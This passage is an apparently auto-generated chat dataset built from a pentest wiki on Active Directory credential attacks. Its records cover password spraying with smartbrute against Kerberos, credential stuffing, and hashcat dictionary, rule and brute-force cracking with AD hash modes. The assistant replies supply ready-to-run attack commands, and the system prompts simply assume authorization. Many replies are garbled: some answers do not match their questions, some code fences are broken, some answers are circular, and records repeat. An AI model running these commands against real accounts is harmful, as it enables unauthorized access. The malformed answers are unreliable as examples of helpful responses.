"docs/src/ad/movement/credentials/bruteforcing/spraying.md", "page_title": "Spraying", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on smartbrute example (dynamic user list)"}, {"role": "assistant", "content": "smartbrute smart -bp \"password\" kerberos -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --kdc-ip \"$KDC\" kerberos"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on smartbrute example (dynamic user list)", "response": "smartbrute smart -bp \"password\" kerberos -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --kdc-ip \"$KDC\" kerberos", "metadata": {"corpus_index": 236, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/bruteforcing/spraying.md", "page_title": "Spraying", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of smartbrute example (static users list)"}, {"role": "assistant", "content": "smartbrute brute -bU users.txt -bp \"password\" kerberos --kdc-ip \"$KDC\" \n```\n\n> [!TIP]\n> Read the \"Password guessing\" article for more insight."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of smartbrute example (static users list)", "response": "smartbrute brute -bU users.txt -bp \"password\" kerberos --kdc-ip \"$KDC\" \n```\n\n> [!TIP]\n> Read the \"Password guessing\" article for more insight.", "metadata": {"corpus_index": 237, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/bruteforcing/spraying.md", "page_title": "Spraying", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for smartbrute example (static users list)"}, {"role": "assistant", "content": "smartbrute brute -bU users.txt -bp \"password\" kerberos --kdc-ip \"$KDC\" \n```\n\n> [!TIP]\n> Read the \"Password guessing\" article for more insight."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for smartbrute example (static users list)", "response": "smartbrute brute -bU users.txt -bp \"password\" kerberos --kdc-ip \"$KDC\" \n```\n\n> [!TIP]\n> Read the \"Password guessing\" article for more insight.", "metadata": {"corpus_index": 237, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/bruteforcing/spraying.md", "page_title": "Spraying", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Stuffing"}, {"role": "assistant", "content": "When credentials are found (through dumping or cracking for instance), attackers can try to use them to obtain access on other accounts. This attacks can be powerful against organizations that use shared or common passwords. \n\nThis technique can be combined with credential guessing when attackers try to operate transformations to the recovered passwords (i.e. numbers and special characters before or after, capital letters, l33tspeak, and so on). These new password lists can even be used in an additional cracking process.\n\n> [!TIP]\n> The same tools used for guessing can be used for stuffing and guessing."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Stuffing", "response": "When credentials are found (through dumping or cracking for instance), attackers can try to use them to obtain access on other accounts. This attacks can be powerful against organizations that use shared or common passwords. \n\nThis technique can be combined with credential guessing when attackers try to operate transformations to the recovered passwords (i.e. numbers and special characters before or after, capital letters, l33tspeak, and so on). These new password lists can even be used in an additional cracking process.\n\n> [!TIP]\n> The same tools used for guessing can be used for stuffing and guessing.", "metadata": {"corpus_index": 238, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/bruteforcing/stuffing.md", "page_title": "Stuffing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Stuffing during a pentest?"}, {"role": "assistant", "content": "When credentials are found (through dumping or cracking for instance), attackers can try to use them to obtain access on other accounts. This attacks can be powerful against organizations that use shared or common passwords. \n\nThis technique can be combined with credential guessing when attackers try to operate transformations to the recovered passwords (i.e. numbers and special characters before or after, capital letters, l33tspeak, and so on). These new password lists can even be used in an additional cracking process.\n\n> [!TIP]\n> The same tools used for guessing can be used for stuffing and guessing."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Stuffing during a pentest?", "response": "When credentials are found (through dumping or cracking for instance), attackers can try to use them to obtain access on other accounts. This attacks can be powerful against organizations that use shared or common passwords. \n\nThis technique can be combined with credential guessing when attackers try to operate transformations to the recovered passwords (i.e. numbers and special characters before or after, capital letters, l33tspeak, and so on). These new password lists can even be used in an additional cracking process.\n\n> [!TIP]\n> The same tools used for guessing can be used for stuffing and guessing.", "metadata": {"corpus_index": 238, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/bruteforcing/stuffing.md", "page_title": "Stuffing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Cracking - Theory"}, {"role": "assistant", "content": "Attacking Active Directory domains often leads to obtaining password interesting, but either hashed or encrypted data. When this information cannot be directly leveraged for higher privileges (like with pass-the-hash, overpass-the-hash), it is required to crack it.\n\nCracking is an operation that can be carried out through different types of attacks:\n\n* Brute-force: every possibility for a given character set and a given length (i.e. aaa, aab, aac, ...) is hashed and compared against the target hash.\n* Dictionary: every word of a given list (a.k.a. dictionary) is hashed and compared against the target hash.\n* Rainbow tables: the hash is looked for in a pre-computed table. It is a time-memory trade-off that allows cracking hashes faster, but costing a greater amount of memory than traditional brute-force of dictionary attacks. This attack cannot work if the hashed value is salted (i.e. hashed with an additional random value as prefix/suffix, making the pre-computed table irrelevant)\n\nThere are many other and more complex types of attacks (incremental, mask, rules, hybrid types, ...) but the major/core ones are the three above."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Cracking - Theory", "response": "Attacking Active Directory domains often leads to obtaining password interesting, but either hashed or encrypted data. When this information cannot be directly leveraged for higher privileges (like with pass-the-hash, overpass-the-hash), it is required to crack it.\n\nCracking is an operation that can be carried out through different types of attacks:\n\n* Brute-force: every possibility for a given character set and a given length (i.e. aaa, aab, aac, ...) is hashed and compared against the target hash.\n* Dictionary: every word of a given list (a.k.a. dictionary) is hashed and compared against the target hash.\n* Rainbow tables: the hash is looked for in a pre-computed table. It is a time-memory trade-off that allows cracking hashes faster, but costing a greater amount of memory than traditional brute-force of dictionary attacks. This attack cannot work if the hashed value is salted (i.e. hashed with an additional random value as prefix/suffix, making the pre-computed table irrelevant)\n\nThere are many other and more complex types of attacks (incremental, mask, rules, hybrid types, ...) but the major/core ones are the three above.", "metadata": {"corpus_index": 239, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Cracking - Theory?"}, {"role": "assistant", "content": "Attacking Active Directory domains often leads to obtaining password interesting, but either hashed or encrypted data. When this information cannot be directly leveraged for higher privileges (like with pass-the-hash, overpass-the-hash), it is required to crack it.\n\nCracking is an operation that can be carried out through different types of attacks:\n\n* Brute-force: every possibility for a given character set and a given length (i.e. aaa, aab, aac, ...) is hashed and compared against the target hash.\n* Dictionary: every word of a given list (a.k.a. dictionary) is hashed and compared against the target hash.\n* Rainbow tables: the hash is looked for in a pre-computed table. It is a time-memory trade-off that allows cracking hashes faster, but costing a greater amount of memory than traditional brute-force of dictionary attacks. This attack cannot work if the hashed value is salted (i.e. hashed with an additional random value as prefix/suffix, making the pre-computed table irrelevant)\n\nThere are many other and more complex types of attacks (incremental, mask, rules, hybrid types, ...) but the major/core ones are the three above."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Cracking - Theory?", "response": "Attacking Active Directory domains often leads to obtaining password interesting, but either hashed or encrypted data. When this information cannot be directly leveraged for higher privileges (like with pass-the-hash, overpass-the-hash), it is required to crack it.\n\nCracking is an operation that can be carried out through different types of attacks:\n\n* Brute-force: every possibility for a given character set and a given length (i.e. aaa, aab, aac, ...) is hashed and compared against the target hash.\n* Dictionary: every word of a given list (a.k.a. dictionary) is hashed and compared against the target hash.\n* Rainbow tables: the hash is looked for in a pre-computed table. It is a time-memory trade-off that allows cracking hashes faster, but costing a greater amount of memory than traditional brute-force of dictionary attacks. This attack cannot work if the hashed value is salted (i.e. hashed with an additional random value as prefix/suffix, making the pre-computed table irrelevant)\n\nThere are many other and more complex types of attacks (incremental, mask, rules, hybrid types, ...) but the major/core ones are the three above.", "metadata": {"corpus_index": 239, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Cracking - Practice?"}, {"role": "assistant", "content": "One of the greatest tools that can be used for cracking is hashcat (C). It implements different types of attacks and many types of hashes. It has many other great features like\n\n* it is cross-platform (support for Linux, Windows and macOS) and supports anything that comes with an OpenCL runtime (CPU, GPU, APU, ...)\n* it can crack multiple hashes at the same time and use multiple devices at once (distributed cracking networks supported too)\n* it can save and restore sessions\n* it has a builtin benchmarking system\n\nBelow is a short list of the most useful hash types for Active Directory hunting.\n\n| Hash type | -m/--hash-type number |\n| ------------------------------------------------------ | ------------------------------------------------------------------------------------ |\n| LM hash | 3000 |\n| NT hash | 1000 |\n| LM response | not supported |\n| LMv2 response | not supported |\n| NTLM response | 5500 |\n| NTLMv2 response | 5600 |\n| (DCC1) Domain Cached Credentials | 1100 |\n| (DCC2) Domain Cached Credentials 2 | 2100 |\n| ASREQroast | 7500 |\n| ASREProast | 18200 |\n| Kerberoast | 13100 |"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Cracking - Practice?", "response": "One of the greatest tools that can be used for cracking is hashcat (C). It implements different types of attacks and many types of hashes. It has many other great features like\n\n* it is cross-platform (support for Linux, Windows and macOS) and supports anything that comes with an OpenCL runtime (CPU, GPU, APU, ...)\n* it can crack multiple hashes at the same time and use multiple devices at once (distributed cracking networks supported too)\n* it can save and restore sessions\n* it has a builtin benchmarking system\n\nBelow is a short list of the most useful hash types for Active Directory hunting.\n\n| Hash type | -m/--hash-type number |\n| ------------------------------------------------------ | ------------------------------------------------------------------------------------ |\n| LM hash | 3000 |\n| NT hash | 1000 |\n| LM response | not supported |\n| LMv2 response | not supported |\n| NTLM response | 5500 |\n| NTLMv2 response | 5600 |\n| (DCC1) Domain Cached Credentials | 1100 |\n| (DCC2) Domain Cached Credentials 2 | 2100 |\n| ASREQroast | 7500 |\n| ASREProast | 18200 |\n| Kerberoast | 13100 |", "metadata": {"corpus_index": 240, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Cracking - Practice during a pentest?"}, {"role": "assistant", "content": "One of the greatest tools that can be used for cracking is hashcat (C). It implements different types of attacks and many types of hashes. It has many other great features like\n\n* it is cross-platform (support for Linux, Windows and macOS) and supports anything that comes with an OpenCL runtime (CPU, GPU, APU, ...)\n* it can crack multiple hashes at the same time and use multiple devices at once (distributed cracking networks supported too)\n* it can save and restore sessions\n* it has a builtin benchmarking system\n\nBelow is a short list of the most useful hash types for Active Directory hunting.\n\n| Hash type | -m/--hash-type number |\n| ------------------------------------------------------ | ------------------------------------------------------------------------------------ |\n| LM hash | 3000 |\n| NT hash | 1000 |\n| LM response | not supported |\n| LMv2 response | not supported |\n| NTLM response | 5500 |\n| NTLMv2 response | 5600 |\n| (DCC1) Domain Cached Credentials | 1100 |\n| (DCC2) Domain Cached Credentials 2 | 2100 |\n| ASREQroast | 7500 |\n| ASREProast | 18200 |\n| Kerberoast | 13100 |"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Cracking - Practice during a pentest?", "response": "One of the greatest tools that can be used for cracking is hashcat (C). It implements different types of attacks and many types of hashes. It has many other great features like\n\n* it is cross-platform (support for Linux, Windows and macOS) and supports anything that comes with an OpenCL runtime (CPU, GPU, APU, ...)\n* it can crack multiple hashes at the same time and use multiple devices at once (distributed cracking networks supported too)\n* it can save and restore sessions\n* it has a builtin benchmarking system\n\nBelow is a short list of the most useful hash types for Active Directory hunting.\n\n| Hash type | -m/--hash-type number |\n| ------------------------------------------------------ | ------------------------------------------------------------------------------------ |\n| LM hash | 3000 |\n| NT hash | 1000 |\n| LM response | not supported |\n| LMv2 response | not supported |\n| NTLM response | 5500 |\n| NTLMv2 response | 5600 |\n| (DCC1) Domain Cached Credentials | 1100 |\n| (DCC2) Domain Cached Credentials 2 | 2100 |\n| ASREQroast | 7500 |\n| ASREProast | 18200 |\n| Kerberoast | 13100 |", "metadata": {"corpus_index": 240, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Cracking - Dictionnary attack"}, {"role": "assistant", "content": "Below is an example of how to use hashcat for a dictionary attack.\n\n``bash\nhashcat --attack-mode 0 --hash-type $number $hashes_file $wordlist_file\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Cracking - Dictionnary attack", "response": "Below is an example of how to use hashcat for a dictionary attack.\n\n``bash\nhashcat --attack-mode 0 --hash-type $number $hashes_file $wordlist_file\n``", "metadata": {"corpus_index": 241, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Cracking - Dictionnary attack?"}, {"role": "assistant", "content": "Below is an example of how to use hashcat for a dictionary attack.\n\n``bash\nhashcat --attack-mode 0 --hash-type $number $hashes_file $wordlist_file\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Cracking - Dictionnary attack?", "response": "Below is an example of how to use hashcat for a dictionary attack.\n\n``bash\nhashcat --attack-mode 0 --hash-type $number $hashes_file $wordlist_file\n``", "metadata": {"corpus_index": 241, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use hashcat for cracking - dictionnary attack?"}, {"role": "assistant", "content": "hashcat --attack-mode 0 --hash-type $number $hashes_file $wordlist_file"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use hashcat for cracking - dictionnary attack?", "response": "hashcat --attack-mode 0 --hash-type $number $hashes_file $wordlist_file", "metadata": {"corpus_index": 242, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "hashcat"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Cracking - Dictionnary attack"}, {"role": "assistant", "content": "hashcat --attack-mode 0 --hash-type $number $hashes_file $wordlist_file"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Cracking - Dictionnary attack", "response": "hashcat --attack-mode 0 --hash-type $number $hashes_file $wordlist_file", "metadata": {"corpus_index": 242, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `hashcat --attack-mode 0 --hash-type $number $hashes_file $wordlist_file`?"}, {"role": "assistant", "content": "This command is used for cracking - dictionnary attack. Dictionnary attack"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `hashcat --attack-mode 0 --hash-type $number $hashes_file $wordlist_file`?", "response": "This command is used for cracking - dictionnary attack. Dictionnary attack", "metadata": {"corpus_index": 242, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Cracking - Dictionary and rules attack?"}, {"role": "assistant", "content": "> [!TIP]\n> Hashcat has the ability to inject the plain passwords cracked into the dictionary and start the attack again, and this recursively until no new passwords are found. This can be done with the --loopback argument.\n>\n> _Nota bene: the new passwords are added to dictionnary caches that will be temporary and deleted after the bruteforce+rules+loopack attack ends._\n\nHashcat can also be used in a hybrid mode by combining a dictionary attack with rules that will operate transformations to the words of the list.\n\n* Great wordlists: weakpass, packetstorm\n* Great rules: pantagrule, OneRuleToRuleThemAll \n\n``bash\nhashcat --loopback --attack-mode 0 --rules-file $rules_file --hash-type $number $hashes_file $wordlist_file\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Cracking - Dictionary and rules attack?", "response": "> [!TIP]\n> Hashcat has the ability to inject the plain passwords cracked into the dictionary and start the attack again, and this recursively until no new passwords are found. This can be done with the --loopback argument.\n>\n> _Nota bene: the new passwords are added to dictionnary caches that will be temporary and deleted after the bruteforce+rules+loopack attack ends._\n\nHashcat can also be used in a hybrid mode by combining a dictionary attack with rules that will operate transformations to the words of the list.\n\n* Great wordlists: weakpass, packetstorm\n* Great rules: pantagrule, OneRuleToRuleThemAll \n\n``bash\nhashcat --loopback --attack-mode 0 --rules-file $rules_file --hash-type $number $hashes_file $wordlist_file\n``", "metadata": {"corpus_index": 243, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Cracking - Dictionary and rules attack"}, {"role": "assistant", "content": "> [!TIP]\n> Hashcat has the ability to inject the plain passwords cracked into the dictionary and start the attack again, and this recursively until no new passwords are found. This can be done with the --loopback argument.\n>\n> _Nota bene: the new passwords are added to dictionnary caches that will be temporary and deleted after the bruteforce+rules+loopack attack ends._\n\nHashcat can also be used in a hybrid mode by combining a dictionary attack with rules that will operate transformations to the words of the list.\n\n* Great wordlists: weakpass, packetstorm\n* Great rules: pantagrule, OneRuleToRuleThemAll \n\n``bash\nhashcat --loopback --attack-mode 0 --rules-file $rules_file --hash-type $number $hashes_file $wordlist_file\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Cracking - Dictionary and rules attack", "response": "> [!TIP]\n> Hashcat has the ability to inject the plain passwords cracked into the dictionary and start the attack again, and this recursively until no new passwords are found. This can be done with the --loopback argument.\n>\n> _Nota bene: the new passwords are added to dictionnary caches that will be temporary and deleted after the bruteforce+rules+loopack attack ends._\n\nHashcat can also be used in a hybrid mode by combining a dictionary attack with rules that will operate transformations to the words of the list.\n\n* Great wordlists: weakpass, packetstorm\n* Great rules: pantagrule, OneRuleToRuleThemAll \n\n``bash\nhashcat --loopback --attack-mode 0 --rules-file $rules_file --hash-type $number $hashes_file $wordlist_file\n``", "metadata": {"corpus_index": 243, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use hashcat for cracking - dictionary and rules attack?"}, {"role": "assistant", "content": "hashcat --loopback --attack-mode 0 --rules-file $rules_file --hash-type $number $hashes_file $wordlist_file"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use hashcat for cracking - dictionary and rules attack?", "response": "hashcat --loopback --attack-mode 0 --rules-file $rules_file --hash-type $number $hashes_file $wordlist_file", "metadata": {"corpus_index": 244, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "hashcat"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Cracking - Dictionary and rules attack?"}, {"role": "assistant", "content": "hashcat --loopback --attack-mode 0 --rules-file $rules_file --hash-type $number $hashes_file $wordlist_file"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Cracking - Dictionary and rules attack?", "response": "hashcat --loopback --attack-mode 0 --rules-file $rules_file --hash-type $number $hashes_file $wordlist_file", "metadata": {"corpus_index": 244, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `hashcat --loopback --attack-mode 0 --rules-file $rules_file --hash-type $number $hashes_file $wordlist_file`?"}, {"role": "assistant", "content": "This command is used for cracking - dictionary and rules attack. Dictionary and rules attack"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `hashcat --loopback --attack-mode 0 --rules-file $rules_file --hash-type $number $hashes_file $wordlist_file`?", "response": "This command is used for cracking - dictionary and rules attack. Dictionary and rules attack", "metadata": {"corpus_index": 244, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Cracking - Brute-force attack in the context of penetration testing"}, {"role": "assistant", "content": "> [!SUCCESS] TL; DR - 8 chars bruteforce\n> Below is a hashcat command that bruteforces any password from 4 to 8 characters long. Each character can be any printable character.\n> \n> ``bash\n> hashcat --attack-mode 3 --increment --increment-min 4 --increment-max 8 --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a?a?a?a?a\"\n> `\n\nHashcat has the following built-in charsets that can be used.\n\n`\n?l = abcdefghijklmnopqrstuvwxyz\n?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ\n?d = 0123456789\n?s = !\"#$%&'()*+,-./:;<=>?@[\\]^_{|}~\n?a = ?l?u?d?s\n?b = 0x00 - 0xff\n``\n\nBelow are examples of hashcat being used with built-in charset.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Cracking - Brute-force attack in the context of penetration testing", "response": "> [!SUCCESS] TL; DR - 8 chars bruteforce\n> Below is a hashcat command that bruteforces any password from 4 to 8 characters long. Each character can be any printable character.\n> \n> ``bash\n> hashcat --attack-mode 3 --increment --increment-min 4 --increment-max 8 --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a?a?a?a?a\"\n> `\n\nHashcat has the following built-in charsets that can be used.\n\n`\n?l = abcdefghijklmnopqrstuvwxyz\n?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ\n?d = 0123456789\n?s = !\"#$%&'()*+,-./:;<=>?@[\\]^_{|}~\n?a = ?l?u?d?s\n?b = 0x00 - 0xff\n``\n\nBelow are examples of hashcat being used with built-in charset.\n\n``bash", "metadata": {"corpus_index": 245, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": "Cracking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Cracking - Brute-force attack"}, {"role": "assistant", "content": "> [!SUCCESS] TL; DR - 8 chars bruteforce\n> Below is a hashcat command that bruteforces any password from 4 to 8 characters long. Each character can be any printable character.\n> \n> ``bash\n> hashcat --attack-mode 3 --increment --increment-min 4 --increment-max 8 --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a?a?a?a?a\"\n> `\n\nHashcat has the following built-in charsets that can be used.\n\n`\n?l = abcdefghijklmnopqrstuvwxyz\n?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ\n?d = 0123456789\n?s = !\"#$%&'()*+,-./:;<=>?@[\\]^_{|}~\n?a = ?l?u?d?s\n?b = 0x00 - 0xff\n``\n\nBelow are examples of hashcat being used with built-in charset.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Cracking - Brute-force attack", "response": "> [!SUCCESS] TL; DR - 8 chars bruteforce\n> Below is a hashcat command that bruteforces any password from 4 to 8 characters long. Each character can be any printable character.\n> \n> ``bash\n> hashcat --attack-mode 3 --increment --increment-min 4 --increment-max 8 --hash-type $number $hashes_file \"?a?a?a?a?a?a?a?a?a?a?a?a\"\n> `\n\nHashcat has the following built-in charsets that can be used.\n\n`\n?l = abcdefghijklmnopqrstuvwxyz\n?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ\n?d = 0123456789\n?s = !\"#$%&'()*+,-./:;<=>?@[\\]^_{|}~\n?a = ?l?u?d?s\n?b = 0x00 - 0xff\n``\n\nBelow are examples of hashcat being used with built-in charset.\n\n``bash", "metadata": {"corpus_index": 245, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/cracking.md", "page_title": 